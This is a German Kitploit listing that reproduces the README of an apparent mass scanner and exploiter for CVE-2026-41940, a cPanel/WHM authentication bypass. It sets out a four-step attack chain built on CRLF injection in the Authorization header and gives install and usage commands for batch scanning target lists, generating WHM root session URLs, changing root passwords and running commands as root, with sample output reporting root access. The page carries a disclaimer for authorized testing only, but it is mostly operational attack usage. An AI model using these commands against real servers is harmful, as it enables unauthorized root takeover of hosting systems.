Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-41940 — cPanel/WHM CVE-2026-41940 - Mass Scanner & Exploiter | Kitploit
Tools/GitHubGitHub/lutfifakee-project/cve-2026-41940
Vulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPenetration TestingCommand and ControlAuthenticationRed TeamingPayload Development
GitHublutfifakee-project/cve-2026-41940

CVE-2026-41940

cPanel/WHM CVE-2026-41940 - Mass Scanner & Exploiter

2vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigenWebseite

CVE-2026-41940 - cPanel/WHM Auth-Bypass-Scanner & Exploit-Tool

Python License Security Tested on

cPanel/WHM Authentifizierungs-Bypass-Scanner & Exploit-Tool für CVE-2026-41940


⚠️ Haftungsausschluss

Dieses Tool wird ausschließlich zu Bildungszwecken und für autorisierte Sicherheitstests bereitgestellt.

Durch die Nutzung dieses Tools stimmen Sie zu, dass:

  • Sie nur Systeme testen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung haben.
  • Sie verstehen, dass unautorisierter Zugriff auf Computersysteme illegal ist.
  • Sie sind allein für Ihre Handlungen bei der Nutzung dieses Tools verantwortlich.
  • Sie dürfen dieses Tool nicht weiterverbreiten, modifizieren oder als Ihr eigenes ausgeben.

❗ Der Autor übernimmt KEINE Verantwortung für Missbrauch, illegale Aktivitäten, Schäden oder rechtliche Konsequenzen, die sich aus der Nutzung dieses Tools ergeben.


🎯 Überblick

CVE-2026-41940 ist eine kritische Schwachstelle zur Authentifizierungsumgehung in cPanel/WHM, die es Angreifern ermöglichen kann, ohne gültige Anmeldedaten unbefugten Root-Zugriff zu erlangen.

Dieses Tool bietet eine Python-basierte Implementierung für:

  • Erkennung verwundbarer Ziele
  • Automatisierung der Ausnutzung (für autorisierte Tests)
  • Durchführung großflächiger Scans

🔥 4-stufige Angriffskette


✨ Funktionen


📋 Voraussetzungen

root@kitploit:~
Python 3.7+
pip install requests urllib3

🚀 Installation

root@kitploit:~
git clone https://github.com/Lutfifakee-Project/CVE-2026-41940.git
cd CVE-2026-41940
pip install -r requirements.txt

# Test with single target
python cpanel-mass-checker.py -u https://your-target.com:2087 -hostname your-target.com

📖 Verwendung

Grundlegende Befehle

root@kitploit:~
# Single target
python cpanel-mass-checker.py -u https://target.com:2087

# Batch scan
python cpanel-mass-checker.py -f targets.txt -c 20

# Batch scan with port scanning
python cpanel-mass-checker.py -f targets.txt -c 20 --scan-ports -o results.txt

# Generate session URL
python cpanel-mass-checker.py -u https://target.com:2087 -session -hostname target.com

# Change root password
python cpanel-mass-checker.py -u https://target.com:2087 -passwd "NewPass123!" -hostname target.com

# Execute command (RCE)
python cpanel-mass-checker.py -u https://target.com:2087 -cmd "id" -hostname target.com

# WHM API call
python cpanel-mass-checker.py -u https://target.com:2087 -api listaccts -hostname target.com

📄 Ziel-Dateiformat (targets.txt)

root@kitploit:~
# Lines starting with # are comments
https://target1.com:2087
target2.com
192.168.1.100
cpanel.example.com:2083

⚙️ Parameter


📊 Beispielausgabe

Batch-Scan

root@kitploit:~
[*] Total: 4 targets (after dedup), concurrency: 10
[*] Port scanning: ON (2082, 2083, 2086, 2087)
------------------------------------------------------------
[2/4] [VULN] https://example.com:2087 - token=/cpsess1048057410
[1/4] [SAFE] safe-target.com
------------------------------------------------------------
[*] Scan completed. Vulnerable: 1
[+] Results saved to result.txt

Session-URL-Generierung

root@kitploit:~
[0] hostname = example.com
[1] minting a preauth session...
[2] sending the CRLF injection...
[3] firing do_token_denied...
[4] verifying WHM root access...
[+] WHM root access obtained!
[+] Session URL:
    https://example.com:2087/cpsessXXXXXXX/

🛡️ Schwachstellendetails

FeldWert
CVECVE-2026-41940
SchweregradKritisch (CVSS 9.8)
AngriffsvektorNetzwerk
Erforderliche Berechtigungen

Betroffene Versionen

  • WHM 11.110.x < 11.110.0.97
  • WHM 11.118.x < 11.118.0.63
  • WHM 11.126.x < 11.126.0.54
  • WHM 11.132.x < 11.132.0.29
  • WHM 11.134.x < 11.134.0.20
  • WHM 11.136.x < 11.136.0.5

⚠️ Wichtige Hinweise

  • Nur auf autorisierten Systemen verwenden
  • Sitzungstoken laufen schnell ab
  • RCE kann bei eingeschränkten Lizenzen fehlschlagen
  • Einige Ziele erfordern -hostname
  • Der gesamte Verkehr verwendet HTTPS

🧪 Testumgebung

Für sichere und legale Tests:

  • Verwenden Sie Ihren eigenen VPS/Server
  • Richten Sie eine verwundbare Laborumgebung ein
  • Holen Sie immer eine schriftliche Genehmigung ein

⭐ Unterstützung

Wenn Ihnen dieses Projekt geholfen hat, ziehen Sie in Betracht, ihm einen ⭐ zu geben

Tool herunterladen
StufeBeschreibung
1. Pre-AuthentifizierungSenden ungültiger Anmeldedaten an /login/, um das whostmgrsession-Cookie zu erhalten
2. CRLF-InjectionEinfügen eines Zeilenumbruchs über den Authorization: Basic-Header, um das cpsess-Token preiszugeben
3. Token-WeitergabeAuslösen von do_token_denied, um das Token in den Cache zu propagieren
4. VerifikationZugriff auf /json-api/version, um den WHM-Root-Zugriff zu bestätigen
FunktionBeschreibung
🔄 Batch-ScanningMehrere Ziele gleichzeitig scannen
🎯 EinzelzielEinzelnes Ziel mit detaillierter Ausgabe scannen
🔌 Port-ScanningAutomatisches Scannen der WHM-Ports (2082, 2083, 2086, 2087)
🔓 Session-URLEin-Klick-WHM-Anmelde-URL generieren
💀 RCESystembefehle als Root ausführen
🔑 Passwort ändernWHM-Root-Passwort ändern
📡 WHM-API-AufrufeWHM-API-Funktionen aufrufen
🎨 Farbige AusgabeVisuelle Ausgabe der Ergebnisse
💾 Ergebnisse exportierenVerwundbare Ziele in Datei speichern
ParameterBeschreibungBeispiel
-uEinzelziel-URL-u https://target.com:2087
-fZiel-Listendatei-f targets.txt
-cParallelität (Threads)-c 20
-oAusgabedatei-o results.txt
-hostnameBenutzerdefinierter Host-Header-hostname cpanel.target.com
--scan-portsAlle WHM-Ports scannen--scan-ports
-sessionAnmelde-URL generieren-session
-passwdRoot-Passwort ändern-passwd "NewPass123"
-cmdBefehl ausführen-cmd "id"
-keepTemporäres Konto behalten-keep
-apiWHM-API aufrufen-api listaccts
-api-paramsAPI-Parameter-api-params "user=root,password=123"
Keine
BenutzerinteraktionKeine